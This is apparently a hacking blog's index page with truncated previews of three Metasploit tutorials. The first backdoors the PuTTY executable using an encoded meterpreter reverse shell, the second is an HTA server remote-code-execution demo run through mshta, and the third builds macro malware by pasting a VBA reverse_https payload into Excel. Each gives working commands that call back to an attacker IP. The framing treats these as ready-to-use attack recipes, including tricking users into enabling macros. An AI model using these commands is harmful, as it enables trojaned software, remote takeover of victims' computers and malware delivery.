Skip to main content

Posts

Active Directory Pentest

Recent posts

Backdooring a Legit application using Metasploit

Backdooring an Executable: Creating customized backdoored executables often took a long period of time to do manually as attackers. The ability to embed a Metasploit Payload in any executable that you want is simply brilliant. When we say any executable, it means any executable. You want to backdoor something you download from the internet? We begin by first downloading our legitimate executable, in this case, the popular PuTTY client. STEP 1: Downloading Putty wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe STEP 2: Start apache server using the following command: service apache2 start STEP 3: Create the malicious executable using the following command: msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.43.15 lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe Note: Replace IP here with your own IP STEP 4: Open msfconsole and type the following commands: use exploit/multi/handler set payload windo

Metasploit HTA exploit

Today, I will give you a demo of the new Windows Hta_Server RCE exploit that allows hackers / penetration testers to have remote access to a windows computer. The exploit was publicly disclosed in late 2016 but was not noticed to the public eye till late 2018. It can be found and used easily by using Metasploit on a Kali-Linux distribution. STEP 1: Check your IP configuration (in this practical I have kept it on Bridge) STEP 2: Fire-up msfconsole in the kali terminal and search for hta_server Commands : service apache2 start msfconsole search HTA use exploit/windows/misc/hta_server STEP 3: Set all the values in the Metasploit variables. Commands: set SRVHOST <Your IP> exploit STEP 4: Open powershell in windows and execute the following command (in your case different URL will be generated):  .\mshta.exe http://192.168.43.15:8080/Zhh7aIVVD.hta As the command gets executed it will open up a session in msfconsole. You can view the session using the following command: sessions -l and

test

MACRO Based Malware (updated)

  How macro malware works Macro malware hides in Microsoft Office files and are delivered as email attachments or inside ZIP files. These files use names that are intended to entice or scare people into opening them. They often look like invoices, receipts, legal documents, and more. Macro malware was fairly common several years ago because macros ran automatically whenever a document was opened. However, in recent versions of Microsoft Office, macros are disabled by default. This means malware authors need to convince users to turn on macros so that their malware can run. They do this by showing fake warnings when a malicious document is opened. Prerequisite: Metasploit Module Windows 10 Microsoft Office STEP 1: Generating payload (VBS) - Open terminal in kali and execute the following command: - msfvenom -p windows/meterpreter/reverse_https lhost=192.168.43.138 lport=1234 -f vba STEP 2: Create a new excel file and open Macros Setting. Copy and paste the code generated(msfvenom) i